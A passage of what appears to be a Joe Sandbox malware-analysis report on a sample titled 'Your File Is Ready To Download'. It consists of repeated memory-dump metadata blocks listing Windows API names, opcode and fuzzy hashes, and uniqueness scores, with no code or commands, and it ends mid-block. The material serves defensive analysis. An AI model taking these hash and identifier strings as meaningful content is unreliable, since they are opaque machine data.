                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4284707085-0
                                                                                                                                                                                                                          • Opcode ID: 70a1a5c750281318e13eed769d00ad76eb9f1bab2f74ea2d25dbdef0590ce66e
                                                                                                                                                                                                                          • Instruction ID: c7586527f098a2a8b7ff876e2397607fa05713f06dc11e3b943ca79693f05f5c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70a1a5c750281318e13eed769d00ad76eb9f1bab2f74ea2d25dbdef0590ce66e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B815B31600B4086FB6B8B27E8447EA77A2F78DBD4F544115EB5987AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4284707085-0
                                                                                                                                                                                                                          • Opcode ID: 44aff692a4f4f5cdd4bab0bbb1ff7b0c55bb7d67c196165569a4d9bae6559c6b
                                                                                                                                                                                                                          • Instruction ID: eeecdc4fbd64b5b419a5610d62b839c45c81a41ccd1ed37310846b5e3f920e9a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44aff692a4f4f5cdd4bab0bbb1ff7b0c55bb7d67c196165569a4d9bae6559c6b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6815B31600B4086FB6B8B27E8547EA77A2F78DBD4F544116EB5A87AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: f485652cac5880dad50802fad91016416bab35216c8eb3106a45425b092cd162
                                                                                                                                                                                                                          • Instruction ID: 754290ec88adaba18583e991395bf60a90ad48095f8bc92dc275f82a9da489b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f485652cac5880dad50802fad91016416bab35216c8eb3106a45425b092cd162
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB813931604B4086FB6B8B27A8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseFullGlobalMessageNamePathPeekPrivateProfileStringUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3404763234-0
                                                                                                                                                                                                                          • Opcode ID: 1388c4d351ce2570b4164d594ae4d6af76ceffa94a9614ce7eeb611f6de3a7e4
                                                                                                                                                                                                                          • Instruction ID: efdc6173ca123e2bd01f38080cae493d5ed657e20b337dd2666299042412dc0e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1388c4d351ce2570b4164d594ae4d6af76ceffa94a9614ce7eeb611f6de3a7e4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18814931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 54208441f3d306d51c8df9389de32a92b07cfe1b348064e363b4b0414f54892b
                                                                                                                                                                                                                          • Instruction ID: 1191e1639a09a14d4b7b03b901b242038490ac5dd7347005523c0baf6754b2ce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54208441f3d306d51c8df9389de32a92b07cfe1b348064e363b4b0414f54892b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalLengthMessagePeekTextUnlockWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1215013059-0
                                                                                                                                                                                                                          • Opcode ID: 60061d16e72e3cff4a3f5403f3acd92cad3e054d8137ebbc2809363e6eef414e
                                                                                                                                                                                                                          • Instruction ID: 86e57e88c68826c5778b0438ad71ee7963a854e0b9f87203da6fc0fe193e29a8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60061d16e72e3cff4a3f5403f3acd92cad3e054d8137ebbc2809363e6eef414e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB814931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: c321ddc10486dd2a807984b8e89f2807dc2c873d3b06f3533af39e9356bb602d
                                                                                                                                                                                                                          • Instruction ID: a4676e33ed2f7808107ffbc7fd6f998e0e9efab569cd39c282aa9bb1afb3e3c0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c321ddc10486dd2a807984b8e89f2807dc2c873d3b06f3533af39e9356bb602d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1814931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalLabelMessagePeekUnlockVolumewcsncpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2345973108-0
                                                                                                                                                                                                                          • Opcode ID: 9c163dcd07f5e021483e659cd4a2dfc4fce8b28f84f8b8b3ae5aedfdfd0a2c47
                                                                                                                                                                                                                          • Instruction ID: 36665a617fa557ede144eef12045c10bbbf348a633edbc5814a2887cafa03f10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c163dcd07f5e021483e659cd4a2dfc4fce8b28f84f8b8b3ae5aedfdfd0a2c47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 5fd863d7807375d79584b23e0e10bd945f8d010755a39822b983e8d0e8c7df6b
                                                                                                                                                                                                                          • Instruction ID: 7ad15db206e1179db98e69b8dc281a1f557dd685810abb8f112aa467b8357aee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fd863d7807375d79584b23e0e10bd945f8d010755a39822b983e8d0e8c7df6b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B814B31604B4086FB6B8B27E8443EA77A2F78DBD4F544116EB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3633153638-0
                                                                                                                                                                                                                          • Opcode ID: 8a998f37e2fdfa1236df407c507618b580ad2237984d28e137e7136215b29367
                                                                                                                                                                                                                          • Instruction ID: da510b3d9ffa379573faa06878c0c8ef6beda39721bab1564d5671ccf652dcc3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a998f37e2fdfa1236df407c507618b580ad2237984d28e137e7136215b29367
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544116FB5947AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 4a35f555f2975b375653c7a3ff067327758057e3e12b4cfece85c44db6b3376c
                                                                                                                                                                                                                          • Instruction ID: 29dd404f60f48d5f99b1dc5af7256f7acaf721eef24dcbaf8b7095fac6f2dc8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a35f555f2975b375653c7a3ff067327758057e3e12b4cfece85c44db6b3376c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 6df3cb06e28922eb3905228710a6288ec4946629e66ec84b7458dd265a49c37d
                                                                                                                                                                                                                          • Instruction ID: 6aba0c7c8afc0dadd3237077b17579cf55288d3d54cc291d73ba965750c60869
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6df3cb06e28922eb3905228710a6288ec4946629e66ec84b7458dd265a49c37d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: bbc6622e5aeaad833a4e897c6d15f019b8f1ce7001faaaadb508107a2508b1b2
                                                                                                                                                                                                                          • Instruction ID: ad0cf5c3f941066eba57e2fe631985fc5696e0107bb60b59f150cdc0fe6c12e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbc6622e5aeaad833a4e897c6d15f019b8f1ce7001faaaadb508107a2508b1b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD813931604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3716859204-0
                                                                                                                                                                                                                          • Opcode ID: db27e6ecbd3b67cca6d281e0d2d247b0278b1f5541c3accbab05ef461dd2b3b2
                                                                                                                                                                                                                          • Instruction ID: 4abc409d21fafa2d938ab0043986c73897adcbd6609f16d6bc1bd75616c4a2d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db27e6ecbd3b67cca6d281e0d2d247b0278b1f5541c3accbab05ef461dd2b3b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39813C31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB59876F5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
